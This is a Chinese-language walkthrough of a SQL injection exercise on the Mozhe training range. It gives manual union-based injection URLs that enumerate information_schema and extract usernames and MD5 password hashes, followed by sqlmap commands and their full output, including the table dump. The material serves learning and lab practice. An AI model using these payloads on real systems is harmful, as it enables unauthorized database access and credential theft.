查找sql注入漏洞位置
发现红框地方有SQL 注入漏洞
初次尝试SQL注入
开整
其实是为了测试 1’and 1=1# ';
http://靶场IP:端口/new_list.php?id=tingjigonggao%201%27and%201=1#%20'
看到这边我直接懵逼了,为什么加上 '# 过滤都不可以了,查阅资料后发现还有其它注释样式:
#、 --+、 --%20、 %23
1.开始漏洞检测:
http://靶场IP:端口/new_list.php?id=tingjigonggao ' and '1'='1' %23 正常
http://靶场IP:端口/new_list.php?id=tingjigonggao ' and '1'='1' --+ 正常
http://靶场IP:端口/new_list.php?id=tingjigonggao ' and '1'='2' --+ 错误
2.开始搜集信息:
确认有这个漏洞,搜索数据库信息,包括但不限于 数据库名,版本号,数据库用户,操作系统等,开始的时候 and 1=1 不行,我直接 sqlmap 干进去的知道是
mysql的,这边直接简单查询个版本号:
http://靶场IP:端口/new_list.php?id= id=tingjigonggao 'and 1=2 union select 1,2,version(),4 --+
这里开始信息还不显示,后面才明白:先置第一条查询语句为假,才显示
查询资料了解到 MariaDB-10.2.15 > mysql5.0
mysql 5.0 以上存在一个自带数掘库名为 information_schema,它是一个存储记录所有数据库名。表名,列名的数据率,也相当于可以通过查询它获取指定教据库下面的表名或列名信息。
http://靶场IP:端口/new_list.php?id= id=tingjigonggao 'and 1=2 union select 1,2,version(),4 --+
3.判断列/字段数
http://靶场IP:端口/new_list.php?id=tingjigonggao ' order by 1 --+ 正常
http://靶场IP:端口/new_list.php?id=tingjigonggao ' order by 2 --+ 正常
http://靶场IP:端口/new_list.php?id=tingjigonggao ' order by 3 --+ 正常
http://靶场IP:端口/new_list.php?id=tingjigonggao ' order by 4 --+ 正常
http://靶场IP:端口/new_list.php?id=tingjigonggao ' order by 5 --+ error
4.根据数据库查表:
http://219.153.49.228:49617/new_list.php?id= id=tingjigonggao 'and 1=2 union select 1,2,group_concat(schema_name),4 from information_schema.schemata --+
查 mozhe_discuz_stormgroup 库
http://219.153.49.228:49617/new_list.php?id=tingjigonggao 'and 1=2 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='stormgroup_member' --+
根据指定表 stormgroup_member 查询表内容:
http://219.153.49.228:49617/new_list.php?id=tingjigonggao 'and 1=2 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='stormgroup_member' --+
查表获取账号密码:
http://219.153.49.228:49617/new_list.php?id=tingjigonggao 'and 1=2 union select 1,2,group_concat(concat_ws(':',name,password)),4 from mozhe_discuz_stormgroup.stormgroup_member --+
5.解密登录
解密:
登录成功:
靶场:
https://www.mozhe.cn/
SQLmap一把梭
手动尝试 1’ and 1=1 发现网站直接错误后,尝试使用 SQLmap
C:\Users\admin\Desktop\Tools\SQLmap>python sqlmap.py -u "http://219.153.49.228:42376/new_list.php?id=tingjigonggao"
___
__H__
___ ___[,]_____ ___ ___ {
1.5.12.7#dev}
|_ -| . ["] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 23:11:56 /2022-01-03/
[23:11:56] [INFO] testing connection to the target URL
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=tingjigonggao' AND 6957=6957 AND 'LrvT'='LrvT
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=tingjigonggao' AND (SELECT 6615 FROM (SELECT(SLEEP(5)))ijKh) AND 'OCXI'='OCXI
Type: UNION query
Title: Generic UNION query (NULL) - 4 columns
Payload: id=-5401' UNION ALL SELECT NULL,NULL,CONCAT(0x716a717671,0x6e54534868474e7353434146766a4b5953526d7a4f52596165564b53545a62705470754f78584c41,0x717a6b7671),NULL-- -
---
[23:12:25] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.6.37
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
发现数据库是 MySQL 版本在 5.0 以上,首先查看先数据库名称:
-D 数据库名称 --tables
[23:14:49] [INFO] retrieved: 'INNODB_SYS_SEMAPHORE_WAITS'
Database: information_schema
[75 tables]
+---------------------------------------+
| ALL_PLUGINS |
| APPLICABLE_ROLES |
| CHARACTER_SETS |
| CLIENT_STATISTICS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
| ENABLED_ROLES |
| ENGINES |
| EVENTS |
| FILES |
| GEOMETRY_COLUMNS |
| GLOBAL_STATUS |
| GLOBAL_VARIABLES |
| INDEX_STATISTICS |
| INNODB_BUFFER_PAGE |
| INNODB_BUFFER_PAGE_LRU |
| INNODB_BUFFER_POOL_STATS |
| INNODB_CMP |
| INNODB_CMPMEM |
| INNODB_CMPMEM_RESET |
| INNODB_CMP_PER_INDEX |
| INNODB_CMP_PER_INDEX_RESET |
| INNODB_CMP_RESET |
| INNODB_FT_BEING_DELETED |
| INNODB_FT_CONFIG |
| INNODB_FT_DEFAULT_STOPWORD |
| INNODB_FT_DELETED |
| INNODB_FT_INDEX_CACHE |
| INNODB_FT_INDEX_TABLE |
| INNODB_LOCKS |
| INNODB_LOCK_WAITS |
| INNODB_METRICS |
| INNODB_MUTEXES |
| INNODB_SYS_COLUMNS |
| INNODB_SYS_DATAFILES |
| INNODB_SYS_FIELDS |
| INNODB_SYS_FOREIGN |
| INNODB_SYS_FOREIGN_COLS |
| INNODB_SYS_INDEXES |
| INNODB_SYS_SEMAPHORE_WAITS |
| INNODB_SYS_TABLES |
| INNODB_SYS_TABLESPACES |
| INNODB_SYS_TABLESTATS |
| INNODB_SYS_VIRTUAL |
| INNODB_TABLESPACES_ENCRYPTION |
| INNODB_TABLESPACES_SCRUBBING |
| INNODB_TRX |
| KEY_CACHES |
| KEY_COLUMN_USAGE |
| PARAMETERS |
| PARTITIONS |
| PLUGINS |
| PROCESSLIST |
| PROFILING |
| REFERENTIAL_CONSTRAINTS |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| SESSION_STATUS |
| SESSION_VARIABLES |
| SPATIAL_REF_SYS |
| STATISTICS |
| SYSTEM_VARIABLES |
| TABLES |
| TABLESPACES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TABLE_STATISTICS |
| TRIGGERS |
| USER_PRIVILEGES |
| USER_STATISTICS |
| VIEWS |
| user_variables |
+---------------------------------------+
获取下表信息
-D 数据库名称 -T 表名称 --columns
C:\Users\admin\Desktop\Tools\SQLmap>python sqlmap.py -u "http://219.153.49.228:42376/new_list.php?id=tingjigonggao" -D mozhe_discuz_stormgroup --tables
___
__H__
___ ___[,]_____ ___ ___ {
1.5.12.7#dev}
|_ -| . [(] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[23:34:43] [INFO] fetching tables for database: 'mozhe_discuz_stormgroup'
[23:34:43] [INFO] retrieved: 'notice'
[23:34:43] [INFO] retrieved: 'stormgroup_member'
Database: mozhe_discuz_stormgroup
[2 tables]
+-------------------+
| notice |
| stormgroup_member |
+-------------------+
C:\Users\admin\Desktop\Tools\SQLmap>python sqlmap.py -u "http://219.153.49.228:42376/new_list.php?id=tingjigonggao" -D mozhe_discuz_stormgroup -T stormgroup_member --columns
[23:41:02] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.6.37
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[23:41:02] [INFO] fetching columns for table 'stormgroup_member' in database 'mozhe_discuz_stormgroup'
[23:41:02] [INFO] retrieved: 'id','int(11)'
[23:41:02] [INFO] retrieved: 'name','varchar(20)'
[23:41:02] [INFO] retrieved: 'password','varchar(255)'
[23:41:03] [INFO] retrieved: 'status','int(11)'
Database: mozhe_discuz_stormgroup
Table: stormgroup_member
[4 columns]
+----------+--------------+
| Column | Type |
+----------+--------------+
| id | int(11) |
| name | varchar(20) |
| password | varchar(255) |
| status | int(11) |
+----------+--------------+
显示这个表所有内容:
C:\Users\admin\Desktop\Tools\SQLmap>python sqlmap.py -u "http://219.153.49.228:42376/new_list.php?id=tingjigonggao" -D mozhe_discuz_stormgroup -T stormgroup_member users --dump --batch
___
__H__
___ ___[,]_____ ___ ___ {
1.5.12.7#dev}
|_ -| . [)] | .'| . |
|___|_ [,]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[23:43:28] [WARNING] user aborted during dictionary-based attack phase (Ctrl+C was pressed)
[23:43:28] [WARNING] no clear password(s) found
Database: mozhe_discuz_stormgroup
Table: stormgroup_member
[2 entries]
+----+-------+--------+----------------------------------+
| id | name | status | password |
+----+-------+--------+----------------------------------+
| 2 | mozhe | 0 | 356f589a7df439f6f744ff19bb8092c0 |
| 1 | mozhe | 1 | 94f394c26135c2d82d3d6c98ad1dee77 |
+----+-------+--------+----------------------------------+